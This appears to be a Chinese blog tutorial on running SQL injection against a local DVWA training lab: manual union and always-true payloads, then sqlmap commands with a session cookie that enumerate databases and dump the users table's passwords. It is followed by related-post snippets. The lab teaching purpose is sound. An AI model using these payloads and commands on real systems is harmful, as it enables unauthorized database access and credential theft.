1、渗透之利用sqlmap对dvwa进行sql注入

最新推荐文章于 2025-06-15 15:14:20 发布
原创 最新推荐文章于 2025-06-15 15:14:20 发布 · 7.3k 阅读 · 37 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透学习

本文详细介绍了在dvwa平台上进行SQL注入攻击的过程,包括寻找注入点、使用sqlmap工具进行测试、获取数据库信息、展示所有表及列的具体值等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

测试环境:dvwa+Kail

1、寻找注入点:http://192.168.43.75/dvwa/vulnerabilities/sqli/

1.2、注入点初步测试: 1' union select user, password from users#

1.3、继续测试:1'or'1'='1

2、使用Kail工具测试:

sqlmap -u http://192.168.43.75/dvwa/vulnerabilities/sqli/?id=1

可以看出需要登录,加上cookie:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6" --batch

成功!可看到服务器配置信息,继续拿数据库信息:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6" --dbs

查看某数据库并展示所有表:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch -D dvwa --tables

查看某数据库某表的所有列:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch  -D dvwa -T users --columns

查询数据:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch -D dvwa -T users -C password,users --dump

查不到需要信息,修改sqlmap参数:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch  --dump -C "user_id,user,password" -T "users" -D "dvwa"
 # --dump -C " " -T " " -D " "参数得到---dvwa数据库---下面的---表users---下面的列(Columns)的具体值,即某(些)属性的具体值

完成!

 

参考文章:

DVWA演练平台之SQL注入(全新认识)

SQL注入-注入点判断

SQLmap注入学习实战 —— dvwa 从low到impossble

使用Sqlmapdvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3537
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入...
SQLmap注入学习实战 —— dvwa 从low到impossble
qq_40476955的博客
01-10 6375
大晚上失眠了于是来写博客 你为啥这么勤奋 白天玩了手动注入,结果发现sql注入的难度给我自动设置成impossible了。每次都要改包,可能这是dvwa在win下的bug吧,虽说不致命,却有些许麻烦。 low级别注入 经过试验发现,medium和high其实都可以这么玩 你SQLMAP真强大 爆破库名 由于DVWA注入是 GET类型的 详细参照前面一篇笔记。 所以我们这
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1586
网络安全-sqlmap学习笔记 sqlmap上面的总连接
sqlmap扫描DVWA靶场(sql注入低、中、高)
xingxin32的博客
06-15 600
二、打开kali,在网页输入搭建好dvwa主机的IP(ps:Windows系统IP查询命令ipconfig,Linux系统IP查询命令ifconfig)6.点开Repeater,并修改代码为id=1 or 1=1(注意:这里根据kali版本的不同,有些需要后面加#,有些不需要)Windows电脑、下载phpstudy、搭建好dvwa靶场、里面有kali、sqlmap、burpsuite等软件。4.-D 数据库名 -T 表名 -C "字段,字段" --dump 获取表字段对应的数据。
sqlmap快速上手教程
weixin_34138377的博客
10-31 355
为什么80%的码农都做不了架构师?>>> ...
SQLMap 注入 DVWA实战
Cobra的博客
12-16 3652
一、low级别 1、进入dvwa界面输入1,点击Submit,得到链接 http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 2、我们用sqlmap进行爆破 sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 我们可以看到需要跳转到login的页面,所以,认为这里.
利用sqlmapdvwa进行sql注入
ZJLE的博客
08-08 5298
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时
sqlmapdvwa进行sql注入
weixin_52971422的博客
04-01 4893
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
渗透测试实验_在kali Linux 2021环境下使用sqlmapDVWA进行sql注入
weixin_47133613的博客
04-06 8891
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1272
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏
初使用sqlmapdvwa进行sql注入
anma5413的博客
12-21 941
1.下载安装dvwa,可以去此处下载:http://www.dvwa.co.uk/ 2.需要安装python运行环境,我使用的是python2.7,python2.7-3.0之间的应该都可以。 3.下载sqlmap包并将其解压 4.直接cmd运行sqlmap,输入sqlmap.py -h查看帮助信息 我在运行sqlmap的时候遇到了这么一个问题,就是输入sqlmap.py -[o...
dvwa——sql手动注入sqlmap自动注入
weixin_30338497的博客
03-25 803
手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id...
DVWA SQL Injection Blind 利用SQLMap注入
Senimo
03-18 1207
DVWA SQL Injection Blind 利用SQLMap注入LowMediumHigh Low 输入数据1,得到回显: 只给出用户是否存在的回显,而且是GET传参,在抓取数据包时,发现还存在有Cookie中的传参: 将文件保存到本地,并在Cookie中的id=1后面加上字符*: 尝试直接使用SQLMapsqlmap -r /root/桌面/1.txt 得到回显: 完成对Low级别的注入 Medium Medium级别需要下拉选择参数提交,使用BurpSuite抓取数据包: 将数
sqlmapdvwa SQL Injection进行带cookie注入
m0_63283172的博客
02-27 967
sqlmapdvwa中输入点进行带cookie注入测试
Sqlmap
mumuzi2的博客
02-25 432
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
sqlmap实现dvwa中的盲注详解
永不垂头的博客
08-06 3407
sqlmap实现dvwa中的盲注详解 一、 dvwasql盲注 ① 启动Burpsuite,在SQL injection(Blind)中输入如下,然后查看Burpsuite中抓到的URL和Cookie。 ② 启动sqlmap,在上图中复制URL和cookie,在sqlmap中输入:sqlmap –u ‘复制的URL’ --cookie=’复制的cookie’ ,可以查看数据库类型。 PHPSESSID=jmrh7e40u41fjch3g2ht57dv00 Cookie: security=low
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 3030
SQL注入漏洞
DVWA靶场SQL注入(low)
qq_61975388的博客
08-17 750
DVWA靶场SQL注入实战
sqlmapdvwa低级sql注入
最新发布
06-21
### 使用sqlmapDVWA低级SQL注入进行渗透测试 在使用sqlmapDVWA的低级SQL注入(Low Level SQL Injection)进行渗透测试时,需要确保正确配置目标URL和相关的Cookies。以下是详细的说明与操作步骤: #### 1. ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值